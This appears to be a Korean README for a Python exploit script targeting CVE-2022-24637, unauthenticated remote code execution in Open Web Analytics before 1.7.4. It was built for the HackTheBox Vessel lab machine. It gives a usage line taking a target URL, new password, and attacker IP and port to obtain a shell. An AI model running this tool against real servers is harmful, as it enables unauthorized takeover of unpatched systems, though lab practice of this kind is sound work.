
Open Web Analytics 버전 <1.7.4에서 인증되지 않은 RCE
Open Web Analytics 버전 <1.7.4에서 인증되지 않은 원격 코드 실행(RCE)
이 스크립트는 CVE-2022-24637 취약점을 자동화하기 위해 제작되었습니다. 이 익스플로잇은 Hackthebox의 Vessel 머신을 위해 만들었습니다. https://app.hackthebox.com/machines/Vessel
익스플로잇과 아이디어는 https://devel0pment.de/?p=2494 를 기반으로 합니다.
다음 매개변수로 스크립트를 실행하세요:
python3 exploit.py http://<url>/ newPassword YourIp YourPort
셸을 얻기 위해 몇 번 실행해야 할 수도 있습니다.
이 스크립트는 개선될 수 있습니다.
